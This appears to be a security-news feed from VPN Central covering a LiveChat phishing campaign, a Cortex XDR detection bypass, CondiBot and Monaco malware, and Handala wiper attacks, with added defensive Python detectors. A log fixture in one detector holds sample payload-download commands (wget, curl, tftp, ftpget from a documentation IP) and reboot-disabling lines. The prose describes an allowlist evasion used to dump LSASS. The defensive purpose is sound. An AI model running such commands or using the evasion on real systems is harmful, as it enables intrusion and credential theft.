VPN Central (https://vpncentral.com/): Expert VPN reviews, news, how-to, and more! Feed last built Tue, 17 Mar 2026 08:50:17 +0000

Phishers abuse LiveChat support tools to steal sensitive data in new SaaS-based tactic
https://vpncentral.com/phishers-abuse-livechat-support-tools-to-steal-sensitive-data-in-new-saas-based-tactic/
Tue, 17 Mar 2026 08:50:16 +0000

A newly documented phishing campaign is abusing LiveChat-hosted pages to trick victims into handing over personal, financial, and authentication data through what looks like a legitimate support session. Cofense says the attacks use refund and order-confirmation lures, then move victims into live chat windows hosted under the lc.chat domain, where attackers harvest details in stages.

The tactic matters because it changes how phishing feels to the victim. Instead of sending users straight to a fake login page, the attackers place them inside a support-style conversation that looks more personal and more trustworthy. Cofense says that real-time interaction lowers suspicion and increases the chance that victims will share sensitive information.

Cofense documented two variants. One spoofed PayPal and promised a $200 refund through a “View Transaction Details” button. The other used a generic order-confirmation lure with a “View Update” link and no visible brand until the victim clicked through. Both routes ended on LiveChat-hosted pages impersonating well-known brands.

How the attack works

In the PayPal-themed version, the victim lands in a LiveChat session that quickly pushes them toward a fake PayPal login page. Cofense says the victim enters login credentials, then submits a multi-factor authentication code sent to their phone. After that, the phishing flow asks for billing details, including payment card information and date of birth, before returning the victim to the LiveChat window with a fake refund confirmation.

Email 1 and Email 2 Body (Source – Cofense)

The Amazon-themed version uses a slightly different flow. Cofense says the page first requests the user’s email address before a supposed live agent appears. From there, the attacker asks for identity details such as a phone number, date of birth, home address, and then full payment card data, including the card number, expiration date, and CVC.

Cofense notes that the attacker language in at least one chat included misspellings and awkward phrasing, which suggests a human operator working from a script rather than a polished automated chatbot. That roughness did not stop the scam from progressing through multiple data collection stages.

Why this tactic is more dangerous than it looks

The biggest advantage for the attackers is trust transfer. Because the links use a legitimate SaaS support environment, the domain and interface may feel safer than a typical phishing page on a random site. That can make victims less cautious, especially when the lure involves a refund or a suspicious order they want to resolve quickly.

Email 2 – LiveChat Harvesting (Source – Cofense)

The tactic also helps phishers collect more than one kind of data in one session. Instead of grabbing only credentials, they can move from identity details to card data to MFA codes in a single guided conversation. That gives them a fuller victim profile and increases the chance of account takeover or payment fraud. This is an inference from Cofense’s documented multi-stage collection flow.

Key details at a glance

Item | Detail
Platform abused | LiveChat
Hosted domain used in lure flow | lc.chat
Main lure themes | Refund notice, order confirmation
Brands impersonated | PayPal, Amazon
Data targeted | Credentials, MFA codes, personal details, payment card data
Collection method | Live chat interaction plus fake login and billing forms

The details in this table come from Cofense’s March 2026 analysis.

CC MFA and Confirmation Message (Source – Cofense)

What users and security teams should watch for

  • Be suspicious of unsolicited refund or order-confirmation emails that push you into chat instead of the brand’s official website or app.
  • Never share MFA codes, full card details, or date of birth inside a support chat opened from an email link. This advice follows directly from the collection steps Cofense observed.
  • Verify transactions by going to the official PayPal, Amazon, or merchant site yourself rather than clicking through an email.
  • Monitor for traffic to suspicious lc.chat URLs and review email security controls for SaaS-hosted phishing links. This recommendation is based on the use of LiveChat-hosted infrastructure in the campaign.
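The last recommendation above, reviewing mail controls for SaaS-hosted phishing links, comes down to two checks: parse the link's hostname properly rather than searching the raw URL for a substring, and treat a hosted-chat link as suspicious only in combination with the lure wording Cofense reported. The following triage function is an added example written for this article, not code from Cofense or from VPN Central; the verdict names, the lure regexes, and the sample messages (including the placeholder chat path) are all constructed here.

```python
import re
from urllib.parse import urlparse

# Hosts the article associates with the campaign's lure flow. Matching is on
# the parsed hostname, never on a raw substring of the URL, so a link such as
# https://lc.chat.example.invalid/ or a path that merely contains "lc.chat"
# does not match.
HOSTED_CHAT_DOMAINS = {"lc.chat"}

# Lure wording reported by Cofense for the two variants (regexes constructed here).
LURE_PATTERNS = {
    "refund notice": re.compile(r"\brefund\b", re.I),
    "order confirmation": re.compile(r"\border confirmation\b", re.I),
    "call-to-action button": re.compile(r"\bview (?:transaction details|update)\b", re.I),
}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)


def host_matches(url, domains):
    """True if the URL's hostname equals one of `domains` or is a subdomain of it."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def triage(subject, body):
    """Classify one message. Returns (verdict, reasons).

    A hosted-chat link on its own is a weak signal, because the platform has
    legitimate customers; the article's pattern is lure wording *plus* a link
    that drops the reader into a chat session, so only the combination is
    held for review.
    """
    text = subject + "\n" + body
    lure_hits = [name for name, pat in LURE_PATTERNS.items() if pat.search(text)]
    chat_links = [u for u in URL_RE.findall(body) if host_matches(u, HOSTED_CHAT_DOMAINS)]

    reasons = []
    if lure_hits:
        reasons.append("lure wording: " + ", ".join(lure_hits))
    if chat_links:
        reasons.append("link to hosted chat page: " + ", ".join(chat_links))

    if lure_hits and chat_links:
        return "hold-for-review", reasons
    if lure_hits or chat_links:
        return "deliver-with-warning", reasons
    return "deliver", reasons


# Constructed sample messages; the link path below is a placeholder, not a real page.
SAMPLE_REFUND_LURE = (
    "Your $200 refund is ready",
    "A refund has been issued to your account.\n"
    "View Transaction Details: https://lc.chat/PLACEHOLDER-CHAT-ID\n",
)
SAMPLE_BENIGN_SUPPORT = (
    "Re: ticket 4411",
    "Thanks for reaching out. Our support hours are 9-5.\n"
    "Chat with us: https://lc.chat/PLACEHOLDER-CHAT-ID\n",
)
SAMPLE_BENIGN_RECEIPT = (
    "Your receipt",
    "Thanks for your purchase. Manage your order at https://shop.example.invalid/orders\n",
)

if __name__ == "__main__":
    for subj, body in (SAMPLE_REFUND_LURE, SAMPLE_BENIGN_SUPPORT, SAMPLE_BENIGN_RECEIPT):
        verdict, why = triage(subj, body)
        print(f"{verdict:22} {subj!r}  {'; '.join(why)}")
```

The hostname check is the part worth copying: `urlparse(...).hostname` plus an exact-or-subdomain comparison rejects look-alike hosts that a naive `"lc.chat" in url` test would accept, and the combined-signal rule keeps legitimate support mail from the same platform out of quarantine.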

FAQ

What is new about this phishing tactic?

It uses a legitimate live support platform to make the phishing flow feel like a real customer service conversation instead of a standard fake login trap.

Which brands were impersonated?

Cofense documented PayPal-themed and Amazon-themed phishing pages in the campaign.

What information did the attackers try to steal?

The campaign targeted email addresses, phone numbers, dates of birth, home addresses, account credentials, MFA codes, and full payment card details.

Why does the lc.chat domain matter?

Because it belongs to LiveChat infrastructure, which can make phishing links look more legitimate to victims and sometimes less suspicious to basic filters. This is an inference from Cofense’s description of the tactic.

Researchers decrypt Palo Alto Cortex XDR BIOC rules and expose major evasion blind spot
https://vpncentral.com/researchers-decrypt-palo-alto-cortex-xdr-bioc-rules-and-expose-major-evasion-blind-spot/
Tue, 17 Mar 2026 08:45:18 +0000

Security researchers say they were able to decrypt Palo Alto Networks Cortex XDR’s preconfigured Behavioral Indicators of Compromise, or BIOC, rules and uncover a major evasion weakness inside them. InfoGuard Labs found that some rules relied on broad built-in exceptions, including one tied to the string \Windows\ccmcache, which could let common attacker actions slip past behavioral detections.

The finding did not mean attackers could disable Cortex XDR outright. The bigger issue was logic. Once the researchers decrypted the rule set, they found allowlist conditions that could be abused to bypass a large share of detections, including a demonstration that used Sysinternals ProcDump to dump LSASS memory without triggering those BIOC rules when the command line included the ccmcache path string.

InfoGuard Labs says it disclosed the issue to Palo Alto Networks in July 2025. Palo Alto later addressed the problem, and the researchers say the bypass is fixed in Cortex XDR Agent 9.1 when paired with Content version 2160, largely by removing the broad global allowlists that made the evasion possible.

What the researchers found

Palo Alto Cortex XDR uses BIOC rules to detect suspicious behavior on endpoints. Palo Alto’s own documentation says these rules cover behaviors tied to processes, registry activity, files, and network events, and that tenants automatically receive preconfigured global BIOC rules through content updates.

InfoGuard Labs says it analyzed Cortex Windows agent versions 8.7 and 8.8 during a red team engagement and traced how the encrypted rules were decrypted. According to the researchers, the decryption process depended on a hardcoded string in the agent files plus values from a plaintext Lua configuration file, which let them recover the rule set in readable form.

Once decrypted, the rule set revealed what InfoGuard described as numerous exceptions and global whitelists. The most important was a rule condition tied to the exact string \Windows\ccmcache in command-line arguments. The researchers say that condition bypassed about half of the platform’s behavioral detections.

Why the ccmcache exception matters

The exception mattered because it was simple to abuse. An attacker did not need a rare exploit or a complex loader. They only needed to append the allowlisted path string to a tool or command that would normally trigger a behavioral rule. InfoGuard’s example used ProcDump from Microsoft Sysinternals to dump LSASS memory, a well-known credential theft technique.

That does not mean every Cortex XDR protection failed at once. This issue centered on BIOC-based behavioral detections, not every possible detection layer in the product. Still, BIOC rules are a major part of Cortex XDR’s behavior-focused detection model, so a broad exception inside them created a serious blind spot. This is an inference based on Palo Alto’s own description of how BIOCs work and InfoGuard’s analysis of the evasion path.

What Palo Alto changed

InfoGuard says Palo Alto Networks fixed the issue at the end of February 2026. According to the researchers, the important fix was not stronger encryption by itself. It was the removal of the permissive global allowlists that made the bypass possible in the first place.

The researchers also say Palo Alto modified how the key generation process works, but they describe the whitelist removal as the main security improvement. They add that a single implant bypassing all rules at once is no longer possible, though they caution that attackers who study the decrypted rules may still find narrower exceptions worth abusing.

Palo Alto’s documentation confirms that Cortex XDR Agent 9.1 became available on January 25, 2026, and that global BIOC rules are delivered through content updates.

Key details at a glance

Item | Detail
Product | Palo Alto Cortex XDR
Researcher | InfoGuard Labs
Main issue | Decrypted BIOC rules exposed broad evasion exceptions
Key evasion string | \Windows\ccmcache
Demonstrated impact | BIOC bypass during LSASS dump with ProcDump
Affected research focus | Cortex Windows agent 8.7 and 8.8
Reported fix | Agent 9.1 with Content version 2160

Why this raises a bigger security question

This case adds to the debate around closed detection ecosystems. InfoGuard argues that hiding rule logic through encryption can create a false sense of safety if the rules themselves contain flawed assumptions or overbroad exceptions. The weakness here was not just secrecy. It was trust in hidden logic that turned out to be easier to abuse than expected.

Palo Alto’s platform does let tenants manage user-defined and global BIOC rules, disable them, copy them, and create exceptions. That flexibility is useful for tuning, but it also shows why rule design matters as much as rule confidentiality.

What defenders should do

  • Update Cortex XDR agents and content so systems run the fixed rule set described by InfoGuard.
  • Review whether operational workflows rely on path-based exceptions or broad allowlists that attackers could mimic. This recommendation follows from the evasion path InfoGuard described.
  • Test detection coverage against common living-off-the-land tools such as ProcDump, especially when arguments or paths can influence rule behavior.
  • Treat preconfigured global detections as useful starting points, not as logic that never needs validation.

FAQ

What are BIOC rules in Cortex XDR?

They are behavioral indicators of compromise that monitor process, file, registry, and network behaviors for suspicious activity.

What was the main evasion method?

InfoGuard says attackers could abuse a broad allowlist tied to the command-line string \Windows\ccmcache, which bypassed many behavioral detections.

Did the researchers break Cortex XDR encryption completely?

They say they decrypted the shipped BIOC rule set for the tested agent versions by reconstructing the key material from values present in the product files.

Is the issue fixed?

InfoGuard says Palo Alto fixed the bypass in Cortex XDR Agent 9.1 with Content version 2160 by removing the broad allowlists and changing parts of the key generation process.

New CondiBot variant and ‘Monaco’ cryptominer expand threats to network devices
https://vpncentral.com/new-condibot-variant-and-monaco-cryptominer-expand-threats-to-network-devices/
Tue, 17 Mar 2026 08:41:39 +0000

Two newly documented malware strains show how quickly financially motivated attackers have moved deeper into network infrastructure. Eclypsium says a new CondiBot variant and a separate cryptomining operation called Monaco were both captured on March 6, 2026, targeting Linux-based devices that include routers, IoT systems, servers, and network appliances.

The larger point is not just the malware itself. It is what the malware says about the threat landscape. Network devices used to sit mostly in the crosshairs of advanced espionage actors, but Eclypsium says the same weak spots now attract botnet operators and cryptojacking crews as well.

That trend matches broader industry data. Eclypsium cites the 2025 Verizon Data Breach Investigations Report as showing an almost eightfold increase in exploitation of edge and network devices, while Google’s threat intelligence work found that nearly a quarter of zero-days exploited in 2025 targeted network and security technologies.

What Eclypsium found

Eclypsium says the first malware sample is a previously undocumented CondiBot variant, a Mirai-derived DDoS botnet designed to turn Linux systems into attack nodes. The second is Monaco, a Go-based SSH scanner and Monero cryptominer that brute-forces weak SSH credentials, compromises exposed systems, and uses them for cryptocurrency mining.

Neither sample had been previously reported on major threat intelligence platforms when Eclypsium found them. The company says that included platforms such as VirusTotal, ThreatFox, Hybrid Analysis, and ELF Digest.

Why the new CondiBot variant stands out

Eclypsium says this CondiBot sample is a generic Linux botnet agent rather than something limited to one vendor. It supports ARM, ARM5, ARM6, ARM7, MIPS, x86, and x86_64, which gives it a broad reach across vulnerable Linux-based devices.

The malware uses a layered delivery routine that cycles through wget, curl, tftp, and ftpget so it can still pull down payloads even if some tools are missing on the target system. Once active, it connects to its command server, disables reboot utilities by setting permissions to 000, manipulates the hardware watchdog, and kills competing botnets running on the same machine.

Eclypsium also found a string inside the binary labeled QTXBOT, which had not appeared in earlier Condi reporting. The researchers say this may indicate a forked variant or an internal project name used by the developers. They also noted that the sample registers 32 attack handlers, more than earlier reported Condi versions, which suggests the addition of new flood techniques or protocol variants.
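The post-infection behaviours Eclypsium lists for this variant (cycling through wget, curl, tftp and ftpget; chmod 000 on reboot utilities; touching the hardware watchdog; killing other processes) are the kind of thing a device's process-execution log can reveal even where no endpoint agent runs. The detector below is an added example written for this article, not Eclypsium's code: the log format, the finding names, the thresholds and the sample lines (using the 198.51.100.0/24 documentation range and made-up process names) are all constructed here.

```python
import re
from collections import defaultdict

# Constructed process-execution log (one exec per line): epoch seconds, host, command line.
SAMPLE_LOG = """\
1773000000 host=rtr-01 cmd=/bin/busybox wget http://198.51.100.7/bins/x.arm -O /tmp/x
1773000003 host=rtr-01 cmd=curl -s http://198.51.100.7/bins/x.arm -o /tmp/x
1773000007 host=rtr-01 cmd=tftp -g -r x.arm 198.51.100.7
1773000009 host=rtr-01 cmd=ftpget 198.51.100.7 /tmp/x x.arm
1773000020 host=rtr-01 cmd=chmod 000 /sbin/reboot /sbin/shutdown
1773000021 host=rtr-01 cmd=sh -c "echo V > /dev/watchdog"
1773000030 host=rtr-01 cmd=killall -9 proc_a
1773000031 host=rtr-01 cmd=killall -9 proc_b
1773000032 host=rtr-01 cmd=pkill -9 -f proc_c
1773000100 host=srv-02 cmd=curl -fsSL https://updates.example.invalid/pkg.tar -o /tmp/pkg.tar
1773000160 host=srv-02 cmd=chmod 644 /etc/motd
""".splitlines()

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
REBOOT_UTILS = {"reboot", "shutdown", "poweroff", "halt"}
KILL_TOOLS = {"kill", "killall", "pkill"}
LOG_RE = re.compile(r"^(?P<ts>\d+) host=(?P<host>\S+) cmd=(?P<cmd>.+)$")


def parse(line):
    m = LOG_RE.match(line)
    return None if m is None else {"ts": int(m["ts"]), "host": m["host"], "cmd": m["cmd"]}


def program(tokens):
    """Name of the program being run, looking through a busybox applet call."""
    name = tokens[0].rsplit("/", 1)[-1]
    if name == "busybox" and len(tokens) > 1:
        name = tokens[1]
    return name


def analyze(lines, window=60, kill_threshold=3):
    """Return {host: sorted findings} for hosts showing the behaviours the article describes."""
    findings = defaultdict(set)
    downloads = defaultdict(list)   # host -> [(ts, tool)]
    kills = defaultdict(int)
    for ev in filter(None, map(parse, lines)):
        toks = ev["cmd"].split()
        if not toks:
            continue
        prog, host = program(toks), ev["host"]
        if prog in DOWNLOADERS:
            downloads[host].append((ev["ts"], prog))
        # chmod 000 aimed at a reboot/shutdown binary: the "disable reboot" step.
        if prog == "chmod" and "000" in toks and any(t.rsplit("/", 1)[-1] in REBOOT_UTILS for t in toks):
            findings[host].add("reboot-utility-disabled")
        # Any command line that references the hardware watchdog device.
        if any("/dev/watchdog" in t for t in toks):
            findings[host].add("watchdog-access")
        if prog in KILL_TOOLS:
            kills[host] += 1
    # Layered delivery: two or more *different* downloaders on one host inside the window.
    for host, hits in downloads.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            tools = {tool for t, tool in hits[i:] if t - t0 <= window}
            if len(tools) >= 2:
                findings[host].add("layered-download")
                break
    for host, n in kills.items():
        if n >= kill_threshold:
            findings[host].add("mass-process-kill")
    return {h: sorted(f) for h, f in findings.items()}


if __name__ == "__main__":
    for host, hits in analyze(SAMPLE_LOG).items():
        print(host, hits)
```

The layered-download check keys on distinct tools rather than on any single download, which is what separates the fallback cascade from a routine update fetch on the second host; on real devices the input would be whatever exec auditing the platform offers, and the thresholds should be tuned against a baseline of normal maintenance activity.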

Mechanism of Attack (Source – Eclypsium)

What Monaco does after it gets in

Monaco takes a different path. Eclypsium says it is written in Go 1.24.0 and acts as both an SSH scanner and a Monero cryptominer. It brute-forces exposed SSH servers across the internet, steals valid credentials, and sends them back to its command-and-control server.

The malware supports multiple architectures, including x86-64, ARM32, ARM64, and MIPS big and little endian, which lets it target servers, routers, IoT gear, and even some Juniper equipment. Eclypsium says Monaco deploys XMRig or XMRigCC to mine Monero through MoneroOcean after it compromises a host.

Eclypsium traced Monaco’s C2 infrastructure to Alibaba Cloud Singapore at 8.222.206.6. The researchers said the operator left behind open directory listings, debug builds, and default tokens, which point to relatively weak operational security.
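Monaco's entry route is plain password guessing against exposed SSH, which is visible in sshd's own log before any miner is dropped. The assessment below is an added example written for this article, not Eclypsium's code: it parses standard sshd "Failed password" / "Accepted ..." lines, flags a source that crosses a failure threshold inside a time window, and escalates when a login from that source succeeds after the burst. The log excerpt, hostnames, thresholds and severity labels are constructed here, using the 203.0.113.0/24 and 192.0.2.0/24 documentation ranges.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log excerpt (syslog format, no year).
SAMPLE_AUTH_LOG = """\
Mar  6 10:01:02 edge-01 sshd[2201]: Failed password for root from 203.0.113.5 port 51122 ssh2
Mar  6 10:01:05 edge-01 sshd[2203]: Failed password for invalid user admin from 203.0.113.5 port 51130 ssh2
Mar  6 10:01:09 edge-01 sshd[2205]: Failed password for invalid user pi from 203.0.113.5 port 51141 ssh2
Mar  6 10:01:12 edge-01 sshd[2207]: Failed password for root from 203.0.113.5 port 51150 ssh2
Mar  6 10:01:16 edge-01 sshd[2209]: Failed password for invalid user user from 203.0.113.5 port 51163 ssh2
Mar  6 10:01:20 edge-01 sshd[2211]: Failed password for root from 203.0.113.5 port 51170 ssh2
Mar  6 10:01:24 edge-01 sshd[2213]: Accepted password for root from 203.0.113.5 port 51177 ssh2
Mar  6 10:40:01 edge-01 sshd[2450]: Failed password for ops from 192.0.2.10 port 40022 ssh2
Mar  6 10:40:06 edge-01 sshd[2452]: Accepted publickey for ops from 192.0.2.10 port 40022 ssh2
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line):
    m = LINE_RE.match(line)
    if m is None:
        return None
    # syslog timestamps carry no year; strptime defaults to 1900, which is fine for deltas
    ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"], "user": m["user"], "ip": m["ip"]}


def assess(lines, threshold=5, window_s=120):
    """Per source IP: flag a burst of `threshold` password failures inside `window_s`
    seconds, and escalate if any login from that IP succeeds after the burst."""
    by_ip = defaultdict(list)
    for ev in filter(None, map(parse_line, lines)):
        by_ip[ev["ip"]].append(ev)
    report = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "Failed" and e["method"] == "password"]
        burst_end = None
        for i in range(len(fails) - threshold + 1):
            if (fails[i + threshold - 1]["ts"] - fails[i]["ts"]).total_seconds() <= window_s:
                burst_end = fails[i + threshold - 1]["ts"]
                break
        if burst_end is None:
            continue  # below threshold: a mistyped password, not a guessing run
        success = any(e["result"] == "Accepted" and e["ts"] >= burst_end for e in evs)
        report[ip] = {
            "failures": len(fails),
            "usernames_tried": sorted({e["user"] for e in fails}),
            "success_after_burst": success,
            "severity": "high" if success else "medium",
        }
    return report


if __name__ == "__main__":
    for ip, info in assess(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

A "high" entry is the case to act on first: the source guessed its way in, so the host is likely already running the miner, and the credential it landed on should be rotated rather than just blocked. The thresholds are deliberately conservative; the second source in the sample (one failure, then a key login) stays out of the report.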

Key details at a glance

Threat | Main role | Target types | Notable traits
CondiBot variant | DDoS botnet | Linux network devices, routers, IoT, servers | Mirai-derived, multi-architecture, 32 attack handlers, QTXBOT string
Monaco | SSH scanner and cryptominer | Servers, IoT devices, routers, network equipment | Go 1.24.0, brute-force SSH, steals credentials, deploys Monero miner

Why network devices keep attracting attackers

Attackers like these devices because they sit at critical points in the network and often run embedded systems that do not support standard endpoint security tools. If an attacker gains control of a router, firewall, or switch, that foothold can support persistence, traffic interception, lateral movement, or large-scale abuse for botnets and mining.

Eclypsium argues that many organizations still treat network gear as opaque infrastructure rather than as endpoints that need the same level of monitoring and security review as servers and laptops. That visibility gap is one reason these campaigns keep working.

What organizations should do

  • Audit internet-facing network devices for unknown processes, suspicious outbound connections, and signs of cryptomining activity.
  • Replace weak or default SSH credentials immediately and restrict SSH access to trusted IP ranges.
  • Keep firmware and software up to date on routers, firewalls, VPN gateways, and IoT hardware.
  • Isolate or retire end-of-life devices that no longer receive vendor patches.
  • Treat network appliances as critical assets that require active monitoring, not as blind spots outside normal endpoint security programs. This last point follows directly from Eclypsium’s broader analysis.

FAQ

What is the new CondiBot variant?

Eclypsium says it is a previously undocumented Mirai-derived DDoS botnet sample that targets a wide range of Linux devices and supports several processor architectures.

What is Monaco?

Monaco is a Go-based SSH brute-forcer and Monero cryptominer that compromises exposed systems, steals credentials, and uses infected hosts for mining.

Are these threats limited to Fortinet devices?

No. Eclypsium says the CondiBot variant is a generic Linux botnet agent that can affect vulnerable Linux devices across vendors.

Why are network devices such a big target now?

Because they sit in high-value parts of the environment and often lack deep security visibility, which makes them attractive to both advanced actors and financially motivated attackers.

Stryker confirms destructive cyberattack as Handala-linked incident disrupts global operations
https://vpncentral.com/stryker-confirms-destructive-cyberattack-as-handala-linked-incident-disrupts-global-operations/
Tue, 17 Mar 2026 08:38:11 +0000

Stryker has confirmed that a March 11 cyberattack caused a global disruption to its Microsoft environment, affecting internal systems used across the company. The medical technology giant says it activated its incident response plan immediately, engaged external cybersecurity experts, and is still working to restore key business systems.

The company has not publicly confirmed that tens of thousands of devices were wiped. What Stryker has confirmed is a major cyberattack with broad operational impact, including disruption to ordering, manufacturing, shipping, and internal communications. Handala has claimed responsibility, and outside researchers have linked the actor to destructive operations associated with Iran-linked activity, but some of the larger public claims about device wipe counts and data theft remain unverified by Stryker itself.

Stryker has also said it has “no indication of ransomware or malware” and believes the incident is contained. That wording matters because it suggests the company has not publicly classified the event as a conventional ransomware attack, even though security researchers tracking Handala have described the group as one that uses destructive wiping techniques.

What Stryker has confirmed

In its March 11 SEC filing, Stryker said it identified a cybersecurity incident affecting certain information technology systems that caused a global disruption to its Microsoft environment. The company said it launched an internal investigation with external support to assess and contain the threat, and warned that the incident could continue to disrupt operations until recovery is complete.

In customer updates published after the filing, Stryker said it was prioritizing restoration of customer-facing ordering and shipping systems first. It also said there was no timeline yet for full recovery, though it described core transactional systems as being on a path to recovery.

The company also stressed that its medical products remain safe to use. Stryker said connected or clinical platforms such as LIFEPAK, Mako, SurgiCount, Vocera Ease, Vocera Edge, and care.ai were unaffected because they either are not connected in the same way or run on separate infrastructure.

What is still not confirmed

Handala and some outside reports have claimed very large-scale destruction, including wipes affecting more than 200,000 devices and the theft of tens of terabytes of data. Stryker has not confirmed those figures in its SEC filing or customer updates. Reuters also reported the group’s claims, but noted that they had not been independently verified.

Reports from Arctic Wolf and Unit 42 point to possible misuse of Microsoft Intune and destructive wipe activity in Handala-linked incidents, but Stryker itself has not publicly said Intune was the initial cause or confirmed the exact wipe mechanism used in its environment.

So the strongest accurate framing is this: Stryker has confirmed a serious cyberattack with major business disruption, while researchers and the threat actor itself claim the operation involved destructive wiping. The exact device count and full scope of data loss remain publicly unconfirmed by Stryker.

Why researchers believe this was a destructive operation

Check Point says Handala Hack, also tracked as Void Manticore, is an Iranian threat actor linked to Iran’s Ministry of Intelligence and Security. Its recent campaigns have used RDP, tunneling tools such as NetBird, custom wiping tools, and manual destructive actions to damage victim environments.

Unit 42 separately warned of an increased risk of Handala-linked wiper attacks and said recent destructive operations reportedly involved phishing and abuse of administrative access through Microsoft Intune. That aligns with the pattern seen in public reporting around the Stryker case, though again, Stryker has not itself confirmed the detailed kill chain.

Operational impact on Stryker

The company told customers that the attack disrupted order processing, manufacturing, and shipping. Reuters separately reported that Stryker’s shares fell after the incident became public and noted that the company had no immediate timeline for full restoration.

Stryker employs about 56,000 people and operates in 61 countries, so even a disruption limited to its internal Microsoft environment can create major downstream effects across support, logistics, and corporate operations.

Key details at a glance

Item | What is confirmed
Incident date | March 11, 2026
Confirmed by Stryker | Yes
Environment affected | Global Microsoft environment
Ransomware confirmed | No
Malware confirmed by Stryker | No indication publicly stated
Operational disruption | Yes, including orders, manufacturing, shipping
Medical product safety | Stryker says products remain safe to use
Exact number of wiped devices | Not confirmed by Stryker

FAQ

Did Stryker confirm a wiper attack?

Not directly in those words. Stryker confirmed a cyberattack and major disruption, but it publicly said it had no indication of ransomware or malware. Researchers tracking Handala say the group uses destructive wiping tactics.

Did Stryker confirm tens of thousands of devices were wiped?

No. That scale of damage has appeared in threat actor claims and external reporting, but Stryker has not publicly confirmed a device wipe count.

Were patient-facing products affected?

Stryker says its medical products remain safe to use and that several named platforms were unaffected.

Who is believed to be behind the attack?

Handala claimed responsibility. Check Point and Unit 42 link Handala to Iran-linked destructive cyber activity.

Handala Hack uses RDP, NetBird, and parallel wipers in MOIS-linked destructive intrusions
https://vpncentral.com/handala-hack-uses-rdp-netbird-and-parallel-wipers-in-mois-linked-destructive-intrusions/
Tue, 17 Mar 2026 08:32:13 +0000

An Iranian threat actor known as Handala Hack has been carrying out destructive intrusions that rely on remote desktop access, NetBird tunneling, and multiple wiping tools launched in parallel to maximize damage. Check Point Research says the group is an online persona operated by Void Manticore, also tracked as Red Sandstorm and Banished Kitten, and links the actor to Iran’s Ministry of Intelligence and Security, or MOIS.

These attacks focus on disruption and destruction rather than quiet intelligence collection alone. Check Point says the group conducts fast, hands-on operations inside victim networks, then deploys several wiping methods at once so recovery becomes much harder. The company says recent activity has targeted organizations in Israel and Albania, while the group has also expanded to U.S. organizations, including medical technology giant Stryker.

The newer campaigns show several tactical changes. Check Point says the actor has started using NetBird, a legitimate peer-to-peer networking tool, to tunnel traffic inside victim environments, and has also deployed an AI-assisted PowerShell script as part of its destructive toolkit. The researchers also said the group showed weaker operational security in some cases, with activity traced directly to Iranian IP addresses instead of commercial VPN services.

How the attacks begin

Check Point says the intrusion often starts with compromised VPN credentials. The actor obtains access through brute-force attempts or supply-chain compromises involving IT service providers, then moves manually through the environment over Remote Desktop Protocol. In at least one victim network, the researchers observed five attacker-controlled machines operating at the same time, which points to an effort to spread damage as quickly as possible.

Once inside, the operators use built-in Windows tooling, credential theft, and lateral movement techniques that Check Point says have stayed fairly consistent from 2024 through 2026. The newer additions, including NetBird, fit into that same playbook by giving the attackers another way to maintain internal access and route traffic around normal controls.

Operational interconnections of Void Manticore (Source – Check Point)

What makes the destructive phase different

Check Point says Handala’s destructive phase runs several wiping methods in parallel. One of the main tools is a custom Handala Wiper distributed through Group Policy logon scripts by way of a batch file named handala.bat. The report says this wiper overwrites file contents and corrupts the Master Boot Record, which adds deeper system damage beyond ordinary file deletion.

The researchers also describe an AI-assisted PowerShell wiper that deletes files from user directories and floods logical drives with a propaganda image named handala.gif. In parallel, the attackers use VeraCrypt, a legitimate encryption tool, to lock drives and make recovery harder. They also manually delete virtual machines and individual files over RDP, a tactic that Check Point says appears in the group’s own leaked videos.

That layered approach matters because it reduces the chance that defenders can stop the attack by blocking just one payload. If one wiping path fails or gets interrupted, others may still destroy enough data to cripple the victim. That conclusion follows directly from Check Point’s description of multiple simultaneous wiping tracks.

Wiper execution of Handala Wiper (Source – Check Point)

Why NetBird stands out

NetBird is not malware. It is a legitimate networking tool, which gives the attackers a practical way to tunnel traffic through the environment while blending in with allowed software. Check Point lists NetBird as one of the newly observed tactics in these intrusions, which suggests the actor is expanding its use of dual-use tools rather than relying only on custom malware.

That trend fits Check Point’s broader assessment of Iranian cyber activity. In a separate March 2026 report, the company said MOIS-linked actors increasingly mix state-directed operations with tools, infrastructure, and access patterns borrowed from the cybercrime ecosystem.

Key details at a glance

Item | Detail
Threat actor | Handala Hack
Broader cluster | Void Manticore
Other names | Red Sandstorm, Banished Kitten
Assessed sponsor link | Iran’s MOIS
Main access methods | Compromised VPN credentials, RDP, supply-chain footholds
Newly highlighted tools | NetBird, AI-assisted PowerShell wiper
Destructive methods | Custom wiper, MBR corruption, VeraCrypt, manual deletion over RDP
Main targeting noted by Check Point | Israel, Albania, and recent expansion to U.S. organizations

What defenders should do

  • Enforce multi-factor authentication on VPN, remote access, and privileged accounts. Check Point explicitly recommends this because compromised remote access remains a core entry point.
  • Monitor for logins from unusual countries, strange hours, unfamiliar devices, and abnormal VPN transfer patterns.
  • Disable RDP where it is not needed, especially on systems that should never allow broad remote administration.
  • Watch closely for NetBird and other tunneling tools in environments where they are not approved.
  • Prepare for multi-tool destructive activity, not just one malware family, because Handala’s impact comes from parallel wiping and manual operator actions together. This last point is an inference from Check Point’s case descriptions.

FAQ

Who is Handala Hack?

Check Point says Handala Hack is an online persona run by Void Manticore, an Iranian threat actor affiliated with MOIS.

What is new in these attacks?

Check Point says recent operations added NetBird tunneling and an AI-assisted PowerShell wiper to a long-running destructive playbook.

Why is RDP important here?

Because the attackers use hands-on remote access to move through victim environments, trigger deletion tasks, and manually destroy assets such as virtual machines.

Are these attacks linked to real-world victims?

Yes. Check Point says the group has targeted organizations in Israel and Albania and has recently expanded to U.S. enterprises such as Stryker.

CamelClone spy campaign abuses public file-sharing sites and Rclone in government-focused attacks
